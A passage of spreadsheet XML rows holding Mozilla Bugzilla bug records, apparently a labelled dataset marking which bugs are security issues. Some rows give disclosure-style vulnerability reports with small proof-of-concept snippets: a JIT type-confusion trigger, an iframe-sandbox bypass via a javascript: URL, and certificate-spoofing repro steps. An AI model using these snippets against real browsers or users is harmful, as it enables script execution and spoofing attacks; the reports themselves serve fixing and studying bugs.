      <c r="R681" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S681" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T681" t="n">
        <v>1</v>
      </c>
      <c r="U681" t="n">
        <v>0</v>
      </c>
      <c r="V681" t="n">
        <v>31</v>
      </c>
      <c r="W681" t="inlineStr">
        <is>
          <t>The Learn More link needs to be rewritten to include the consolidated permission for Push and Web Notifications landing in Fx 44. When prompted for Push notifications, the user now grants permission to receive push notifications in background and to show notifications to the user. 
+++ This bug was initially created as a clone of Bug #1169038 +++
FF needs a landing page for Push Notification background and explanation and is coded to have it be: 
https://www.mozilla.org/en-US/firefox/push/
The content for this page has been written and edited and is here: 
https://docs.google.com/document/d/16-sqk6l_D22PFYXGaEN_8kwHrrhvvoOYx0h-OBIGF-I/edit#heading=h.449qzmjjc36s</t>
        </is>
      </c>
      <c r="X681" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="682">
      <c r="A682" t="n">
        <v>62171</v>
      </c>
      <c r="B682" t="inlineStr">
        <is>
          <t>2000-12-06 19:09:05 -0800</t>
        </is>
      </c>
      <c r="C682" t="inlineStr">
        <is>
          <t>Separate regional content from UI resource files</t>
        </is>
      </c>
      <c r="D682" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E682" t="n">
        <v>1</v>
      </c>
      <c r="F682" t="n">
        <v>1</v>
      </c>
      <c r="G682" t="n">
        <v>2</v>
      </c>
      <c r="H682" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I682" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J682" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K682" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L682" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M682" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N682" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O682" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P682" t="inlineStr"/>
      <c r="Q682" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R682" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S682" t="inlineStr">
        <is>
          <t>mozilla0.9</t>
        </is>
      </c>
      <c r="T682" t="n">
        <v>1</v>
      </c>
      <c r="U682" t="n">
        <v>0</v>
      </c>
      <c r="V682" t="n">
        <v>64</v>
      </c>
      <c r="W682" t="inlineStr">
        <is>
          <t>As of now, langpacks contain both regional contents and UI strings. This makes
the task of leveraging additional regional langpack from a language difficult
and tedious. It also increases the file download size and disk footprint.</t>
        </is>
      </c>
      <c r="X682" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="683">
      <c r="A683" t="n">
        <v>185332</v>
      </c>
      <c r="B683" t="inlineStr">
        <is>
          <t>2002-12-14 02:34:02 -0800</t>
        </is>
      </c>
      <c r="C683" t="inlineStr">
        <is>
          <t>Rewrite the description for timezone param</t>
        </is>
      </c>
      <c r="D683" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:34 -0800</t>
        </is>
      </c>
      <c r="E683" t="n">
        <v>1</v>
      </c>
      <c r="F683" t="n">
        <v>1</v>
      </c>
      <c r="G683" t="n">
        <v>4</v>
      </c>
      <c r="H683" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I683" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J683" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K683" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L683" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M683" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N683" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O683" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P683" t="inlineStr"/>
      <c r="Q683" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R683" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S683" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T683" t="n">
        <v>1</v>
      </c>
      <c r="U683" t="n">
        <v>0</v>
      </c>
      <c r="V683" t="n">
        <v>7</v>
      </c>
      <c r="W683" t="inlineStr">
        <is>
          <t>I'm proposing rewriting the description for the timezone parameter. :-)
The current text lacks a space ("thenthe"), contains a "can't" where "won't"
would be more appropriate (you don't always even _want_ the tz to be displayed)
and refers to "sql server" where "database server" would be more appropriate
("sql server" is a specific database server by Microsoft). 
Patch incoming.</t>
        </is>
      </c>
      <c r="X683" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="684">
      <c r="A684" t="n">
        <v>1312243</v>
      </c>
      <c r="B684" t="inlineStr">
        <is>
          <t>2016-10-22 20:07:11 -0700</t>
        </is>
      </c>
      <c r="C684" t="inlineStr">
        <is>
          <t>Trap site uses repeated http auth prompts to keep the user on the page</t>
        </is>
      </c>
      <c r="D684" t="inlineStr">
        <is>
          <t>2020-06-23 05:41:15 -0700</t>
        </is>
      </c>
      <c r="E684" t="n">
        <v>1</v>
      </c>
      <c r="F684" t="n">
        <v>1</v>
      </c>
      <c r="G684" t="n">
        <v>3</v>
      </c>
      <c r="H684" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I684" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J684" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K684" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L684" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M684" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N684" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O684" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P684" t="inlineStr">
        <is>
          <t>[necko-active][adv-main52+]</t>
        </is>
      </c>
      <c r="Q684" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R684" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S684" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T684" t="n">
        <v>1</v>
      </c>
      <c r="U684" t="n">
        <v>0</v>
      </c>
      <c r="V684" t="n">
        <v>78</v>
      </c>
      <c r="W684" t="inlineStr">
        <is>
          <t>Created attachment 8803672
browserhijacking.png
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Build ID: 20161019084923
Steps to reproduce:
went to a website
Actual results:
browser was redirected multiple times. eventually stopping on a "data" url that pretended to be microsoft and claiming my computer was compromised. What was different to other hijacks was this loaded a 403 password modal dialogue and could not be cleared. The only way to close the rogue site was to shut down the browser from task manager. 
Expected results:
data urls should not be able to render pages and should not be able to trigger dialogues especially modal dialogue boxes that prevent navigating away from the site</t>
        </is>
      </c>
      <c r="X684" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="685">
      <c r="A685" t="n">
        <v>1054359</v>
      </c>
      <c r="B685" t="inlineStr">
        <is>
          <t>2014-08-15 09:35:27 -0700</t>
        </is>
      </c>
      <c r="C685" t="inlineStr">
        <is>
          <t>LCallDOMNative incorrectly assumes |this| is always an object</t>
        </is>
      </c>
      <c r="D685" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:12 -0700</t>
        </is>
      </c>
      <c r="E685" t="n">
        <v>1</v>
      </c>
      <c r="F685" t="n">
        <v>1</v>
      </c>
      <c r="G685" t="n">
        <v>3</v>
      </c>
      <c r="H685" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I685" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J685" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K685" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L685" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M685" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N685" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O685" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P685" t="inlineStr">
        <is>
          <t>[adv-main32+][adv-esr31.1+][adv-esr24.8+]</t>
        </is>
      </c>
      <c r="Q685" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R685" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S685" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T685" t="n">
        <v>1</v>
      </c>
      <c r="U685" t="n">
        <v>0</v>
      </c>
      <c r="V685" t="n">
        <v>19</v>
      </c>
      <c r="W685" t="inlineStr">
        <is>
          <t>Created attachment 8473747
Testcase
I was looking at crash URLs for JIT crashes on crash-stats, and was able to reproduce a crash in JIT code on manpower.com
The problem is that CodeGenerator::visitCallDOMNative does:
    Register obj = masm.extractObject(Address(StackPointer, 0), argObj);
But |this| is not guaranteed to be an object. So if you do something like:
    var method = document.body.mozMatchesSelector;
    method.call(v, "selector");
And v is an integer, we'll treat it as an object pointer and this allows an attacker to do all kinds of scary things.
The attached testcase crashes Nightly for me on OS X, 32-bit (you may have to turn off off-thread compilation first).</t>
        </is>
      </c>
      <c r="X685" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="686">
      <c r="A686" t="n">
        <v>980262</v>
      </c>
      <c r="B686" t="inlineStr">
        <is>
          <t>2014-03-06 03:34:33 -0800</t>
        </is>
      </c>
      <c r="C686" t="inlineStr">
        <is>
          <t>Remove ASK A QUESTION link in the AAQ flow</t>
        </is>
      </c>
      <c r="D686" t="inlineStr">
        <is>
          <t>2014-03-06 09:08:48 -0800</t>
        </is>
      </c>
      <c r="E686" t="n">
        <v>1</v>
      </c>
      <c r="F686" t="n">
        <v>1</v>
      </c>
      <c r="G686" t="n">
        <v>5</v>
      </c>
      <c r="H686" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I686" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J686" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K686" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L686" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M686" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N686" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O686" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P686" t="inlineStr">
        <is>
          <t>u=user c=AAQ p=0 s=2014.5</t>
        </is>
      </c>
      <c r="Q686" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R686" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S686" t="inlineStr">
        <is>
          <t>2014Q1</t>
        </is>
      </c>
      <c r="T686" t="n">
        <v>1</v>
      </c>
      <c r="U686" t="n">
        <v>0</v>
      </c>
      <c r="V686" t="n">
        <v>4</v>
      </c>
      <c r="W686" t="inlineStr">
        <is>
          <t>I was logged out and went to the sumo home page which shows a product picker. I click ASK A QUESTION, looked away, looked back and I thought I was on the same page even though I was in the AAQ product picker now. Then I keeped clicking and felt like I was just reloading the same page over and over, because I was.
Most users probably wont do this, but it doesn't make sense to have a link to ASK A QUESTION when you are already in the process of asking a question.
I'll fix this now. 0pts because trivial.</t>
        </is>
      </c>
      <c r="X686" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="687">
      <c r="A687" t="n">
        <v>1278612</v>
      </c>
      <c r="B687" t="inlineStr">
        <is>
          <t>2016-06-07 09:46:18 -0700</t>
        </is>
      </c>
      <c r="C687" t="inlineStr">
        <is>
          <t>OS X sound output device doesn't update when OS output device is changed</t>
        </is>
      </c>
      <c r="D687" t="inlineStr">
        <is>
          <t>2016-09-09 08:15:51 -0700</t>
        </is>
      </c>
      <c r="E687" t="n">
        <v>1</v>
      </c>
      <c r="F687" t="n">
        <v>1</v>
      </c>
      <c r="G687" t="n">
        <v>3</v>
      </c>
      <c r="H687" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I687" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J687" t="inlineStr">
        <is>
          <t>Audio/Video: cubeb</t>
        </is>
      </c>
      <c r="K687" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L687" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M687" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N687" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O687" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P687" t="inlineStr"/>
      <c r="Q687" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R687" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S687" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T687" t="n">
        <v>1</v>
      </c>
      <c r="U687" t="n">
        <v>0</v>
      </c>
      <c r="V687" t="n">
        <v>29</v>
      </c>
      <c r="W687" t="inlineStr">
        <is>
          <t>Created attachment 8760827
Screenshot showing how I switch the sound output device, using option-click on the speaker icon
While watching a streaming video from Amazon.com using Nightly 50 on OS X 10.11 latest, if the system sound output device is switched, for example, from Line Out to Headphones, the sound doesn't switch and continues to play on Line Out.
This works correctly if Silverlight is used instead. (Testing this by disabling DRM playback in the preferences and allowing Silverlight to be used.) The same video on Chrome with Widevine works.
A quick way to switch the system sound output device is to option-click on the speaker icon. See screenshot.
A workaround seems to be jumping forward or backwards to a different place in the video. In my tests, that caused the video to switch to the correct sound output device after it has been changed.</t>
        </is>
      </c>
      <c r="X687" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="688">
      <c r="A688" t="n">
        <v>1595466</v>
      </c>
      <c r="B688" t="inlineStr">
        <is>
          <t>2019-11-11 03:18:24 -0800</t>
        </is>
      </c>
      <c r="C688" t="inlineStr">
        <is>
          <t>Assertion failure: destOffset &gt;= bytes, at js/src/wasm/WasmBaselineCompile.cpp:1845 or Assertion failure: srcOffset &gt;= bytes, at js/src/wasm/WasmBaselineCompile.cpp:1810</t>
        </is>
      </c>
      <c r="D688" t="inlineStr">
        <is>
          <t>2022-01-10 05:50:59 -0800</t>
        </is>
      </c>
      <c r="E688" t="n">
        <v>1</v>
      </c>
      <c r="F688" t="n">
        <v>1</v>
      </c>
      <c r="G688" t="n">
        <v>3</v>
      </c>
      <c r="H688" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I688" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J688" t="inlineStr">
        <is>
          <t>JavaScript: WebAssembly</t>
        </is>
      </c>
      <c r="K688" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L688" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M688" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N688" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O688" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P688" t="inlineStr">
        <is>
          <t>[post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q688" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R688" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S688" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T688" t="n">
        <v>1</v>
      </c>
      <c r="U688" t="n">
        <v>0</v>
      </c>
      <c r="V688" t="n">
        <v>16</v>
      </c>
      <c r="W688" t="inlineStr">
        <is>
          <t>The attached testcase crashes on mozilla-central revision 72c52c0101cf (build with --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --enable-debug --enable-optimize, run with --no-threads test.js). 
Backtrace:
    received signal SIGSEGV, Segmentation fault.
    #0  js::wasm::BaseStackFrame::shuffleStackResultsTowardSP (temp=..., bytes=8, destHeight=&lt;optimized out&gt;, srcHeight=24, this=0x7fffffffa548) at js/src/wasm/WasmBaselineCompile.cpp:1845
    #1  js::wasm::BaseCompiler::popStackResults (this=this@entry=0x7fffffffa140, iter=..., stackBase=..., stackBase@entry=...) at js/src/wasm/WasmBaselineCompile.cpp:4100
    #2  0x000055555664f18c in js::wasm::BaseCompiler::popBlockResults (kind=js::wasm::BaseCompiler::ContinuationKind::Fallthrough, stackBase=..., type=..., this=0x7fffffffa140) at js/src/wasm/WasmBaselineCompile.cpp:4161
    #3  js::wasm::BaseCompiler::topBlockResults (this=this@entry=0x7fffffffa140, type=...) at js/src/wasm/WasmBaselineCompile.cpp:4243
    #4  0x0000555556600bc7 in js::wasm::BaseCompiler::emitIf (this=this@entry=0x7fffffffa140) at js/src/wasm/WasmBaselineCompile.cpp:8645
    #5  0x00005555566053be in js::wasm::BaseCompiler::emitBody (this=this@entry=0x7fffffffa140) at js/src/wasm/WasmBaselineCompile.cpp:11385
    #6  0x000055555660a728 in js::wasm::BaseCompiler::emitFunction (this=0x7fffffffa140) at js/src/wasm/WasmBaselineCompile.cpp:12278
    #7  js::wasm::BaselineCompileFunctions (env=..., lifo=..., inputs=..., code=code@entry=0x7ffff5f5f3a8, error=error@entry=0x7fffffffc5a8) at js/src/wasm/WasmBaselineCompile.cpp:12443
    #8  0x00005555566a1af5 in ExecuteCompileTask (task=0x7ffff5f5f000, error=0x7fffffffc5a8) at js/src/wasm/WasmGenerator.cpp:743
    #9  0x00005555566a71bc in js::wasm::ModuleGenerator::locallyCompileCurrentTask (this=0x7fffffffb770) at js/src/wasm/WasmGenerator.cpp:776
    #10 js::wasm::ModuleGenerator::finishFuncDefs (this=this@entry=0x7fffffffb770) at js/src/wasm/WasmGenerator.cpp:914
    #11 0x00005555565e2584 in DecodeCodeSection&lt;js::wasm::Decoder&gt; (env=..., d=..., mg=...) at js/src/wasm/WasmCompile.cpp:570
    #12 0x00005555565e3136 in DecodeCodeSection&lt;js::wasm::Decoder&gt; (mg=..., d=..., env=...) at js/src/wasm/WasmCompile.cpp:547
    #13 js::wasm::CompileBuffer (args=..., bytecode=..., error=error@entry=0x7fffffffc5a8, warnings=warnings@entry=0x7fffffffc610, listener=listener@entry=0x0) at js/src/wasm/WasmCompile.cpp:593
    #14 0x00005555566dfa75 in js::WasmModuleObject::construct (cx=&lt;optimized out&gt;, cx@entry=0x7ffff5f27000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/wasm/WasmJS.cpp:1180
    #15 0x00005555559cc7f0 in CallJSNative (cx=0x7ffff5f27000, native=native@entry=0x5555566df8a0 &lt;js::WasmModuleObject::construct(JSContext*, unsigned int, JS::Value*)&gt;, reason=reason@entry=js::CallReason::Call, args=...) at js/src/vm/Interpreter.cpp:456
    [...]
    #28 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:11535
    rax	0x5555580b3fa0	93825037713312
    rbx	0x555556fa6130	93825019830576
    rcx	0x7ffff6c1c2dd	140737333281501
    rdx	0x0	0
    rsi	0x7ffff6eeb770	140737336227696
    rdi	0x7ffff6eea540	140737336223040
    rbp	0x7fffffff9b60	140737488329568
    rsp	0x7fffffff9aa0	140737488329376
    r8	0x7ffff6eeb770	140737336227696
    r9	0x7ffff7fe6cc0	140737354034368
    r10	0x0	0
    r11	0x0	0
    r12	0x7fffffffa140	140737488331072
    r13	0x7fffffff9ba8	140737488329640
    r14	0x18	24
    r15	0x7fffffff9b90	140737488329616
    rip	0x55555664eda9 &lt;js::wasm::BaseCompiler::popStackResults(js::wasm::ABIResultIter&amp;, js::wasm::StackHeight)+2377&gt;
    =&gt; 0x55555664eda9 &lt;js::wasm::BaseCompiler::popStackResults(js::wasm::ABIResultIter&amp;, js::wasm::StackHeight)+2377&gt;:	movl   $0x0,0x0
       0x55555664edb4 &lt;js::wasm::BaseCompiler::popStackResults(js::wasm::ABIResultIter&amp;, js::wasm::StackHeight)+2388&gt;:	ud2</t>
        </is>
      </c>
      <c r="X688" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="689">
      <c r="A689" t="n">
        <v>1752979</v>
      </c>
      <c r="B689" t="inlineStr">
        <is>
          <t>2022-01-31 23:44:51 -0800</t>
        </is>
      </c>
      <c r="C689" t="inlineStr">
        <is>
          <t>TOCTOU flaw when verifying addon signatures: actual install might have different content</t>
        </is>
      </c>
      <c r="D689" t="inlineStr">
        <is>
          <t>2022-08-27 22:30:58 -0700</t>
        </is>
      </c>
      <c r="E689" t="n">
        <v>1</v>
      </c>
      <c r="F689" t="n">
        <v>1</v>
      </c>
      <c r="G689" t="n">
        <v>3</v>
      </c>
      <c r="H689" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I689" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J689" t="inlineStr">
        <is>
          <t>Add-ons Manager</t>
        </is>
      </c>
      <c r="K689" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L689" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M689" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N689" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O689" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P689" t="inlineStr">
        <is>
          <t>[sec-survey][adv-main98+][adv-esr91.7+]</t>
        </is>
      </c>
      <c r="Q689" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R689" t="inlineStr">
        <is>
          <t>S1</t>
        </is>
      </c>
      <c r="S689" t="inlineStr">
        <is>
          <t>98 Branch</t>
        </is>
      </c>
      <c r="T689" t="n">
        <v>1</v>
      </c>
      <c r="U689" t="n">
        <v>0</v>
      </c>
      <c r="V689" t="n">
        <v>21</v>
      </c>
      <c r="W689" t="inlineStr">
        <is>
          <t>The primary flaw of bug 1752888 is a TOCTOU violation when verifying add-on signatures. We initially validate the signature and read enough metadata to show the install permission prompt, but apparently release the file at that point and are none-the-wiser if it gets swapped out with a tampered version before we install it.
This appears to be especially problematic when installing from a local file because we do this right in-place, where the triggering content knows exactly where it is. For add-ons installed from the web we download it to a temp file somewhere to process. It still has the TOCTOU problem, but it's harder to find.</t>
        </is>
      </c>
      <c r="X689" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="690">
      <c r="A690" t="n">
        <v>262689</v>
      </c>
      <c r="B690" t="inlineStr">
        <is>
          <t>2004-10-03 03:45:47 -0700</t>
        </is>
      </c>
      <c r="C690" t="inlineStr">
        <is>
          <t>lock icon and certificates spoofable with "view-source:"</t>
        </is>
      </c>
      <c r="D690" t="inlineStr">
        <is>
          <t>2005-01-24 13:41:56 -0800</t>
        </is>
      </c>
      <c r="E690" t="n">
        <v>1</v>
      </c>
      <c r="F690" t="n">
        <v>1</v>
      </c>
      <c r="G690" t="n">
        <v>3</v>
      </c>
      <c r="H690" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I690" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J690" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K690" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L690" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M690" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N690" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O690" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P690" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q690" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R690" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S690" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T690" t="n">
        <v>1</v>
      </c>
      <c r="U690" t="n">
        <v>0</v>
      </c>
      <c r="V690" t="n">
        <v>14</v>
      </c>
      <c r="W690" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; ja-JP; rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; ja-JP; rv:1.7.3) Gecko/20041001 Firefox/0.10.1
I found a security issue with "view-source:".
When I viewed the source of a secure site in the browser window (e.g.
"view-source:https://bugzilla.mozilla.org/" with a bookmarklet instead of
Ctrl+U), the lock icon and certificates were kept in the location bar. 
So I thought this bug can be used for the certificate spoofing.
I wrote simple testcase based on Bug 253121.
Reproducible: Always
Steps to Reproduce:
1. Load testcase
2. Right click page -&gt; View Page Info, go to security tab
3. Notice that the site (mozilla.org) appears to be secure, 
   and the certificate from https://www.paypal.com/ is shown</t>
        </is>
      </c>
      <c r="X690" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="691">
      <c r="A691" t="n">
        <v>1761981</v>
      </c>
      <c r="B691" t="inlineStr">
        <is>
          <t>2022-03-29 07:17:22 -0700</t>
        </is>
      </c>
      <c r="C691" t="inlineStr">
        <is>
          <t>Firefox sandbox iframe can execute scripts without allow-scripts directive</t>
        </is>
      </c>
      <c r="D691" t="inlineStr">
        <is>
          <t>2024-05-30 10:55:09 -0700</t>
        </is>
      </c>
      <c r="E691" t="n">
        <v>1</v>
      </c>
      <c r="F691" t="n">
        <v>1</v>
      </c>
      <c r="G691" t="n">
        <v>3</v>
      </c>
      <c r="H691" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I691" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J691" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K691" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L691" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M691" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N691" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O691" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P691" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][post-critsmash-triage][adv-main100+][adv-esr91.9+]</t>
        </is>
      </c>
      <c r="Q691" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R691" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S691" t="inlineStr">
        <is>
          <t>101 Branch</t>
        </is>
      </c>
      <c r="T691" t="n">
        <v>1</v>
      </c>
      <c r="U691" t="n">
        <v>0</v>
      </c>
      <c r="V691" t="n">
        <v>27</v>
      </c>
      <c r="W691" t="inlineStr">
        <is>
          <t>When an iframe with the sandbox attribute set to allow-same-origin and allow-top-navigation/allow-top-navigation-by-user-activation (the below snippet), the embedded document can execute the script in the context of the parent document when users click on a javascript URL even if the sandbox attribute does not contain the allow-scripts directive.
```
&lt;iframe sandbox="allow-same-origin allow-top-navigation-by-user-activation" srcdoc="&lt;a target='_top' href='javascript:alert(location)'&gt;alert&lt;/a&gt;"&gt;
```
While I understand that it's logical to allow the embedded document to change the top.location to a javascript URL in this case, it would break the sandbox protection and make it no more secure than not using the sandbox attribute at all (e.g the embedded document can remove the sandbox attribute or reload itself in a new iframe).
It seems Chromium and Safari don't allow this behavior. I also think that is a more reasonable approach because normal users wouldn't expect an iframe without the allow-scripts directive to execute arbitrary scripts.
I noticed the behavior when trying the live demo of a markdown library (https://github.com/markedjs/marked).
The untrusted HTML is sandboxed inside an iframe with the sandbox attribute set to "allow-same-origin allow-top-navigation-by-user-activation": https://marked.js.org/demo/?text=[click me](javascript%3Aalert(location))
The application basically does the following:
```
&lt;iframe id="previewIframe" sandbox="allow-same-origin allow-top-navigation" srcdoc="&lt;base target='_parent'&gt;"&gt;&lt;/iframe&gt;
&lt;script&gt;
        var parsedMarkdown = "&lt;a href=javascript:alert(location)&gt;click me&lt;/a&gt;";
        previewIframe.addEventListener("load", function(){
                previewIframe.contentDocument.body.innerHTML = parsedMarkdown;
        });
&lt;/script&gt;
```
This issue might be related to https://bugzilla.mozilla.org/show_bug.cgi?id=785310</t>
        </is>
      </c>
      <c r="X691" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="692">
      <c r="A692" t="n">
        <v>728260</v>
      </c>
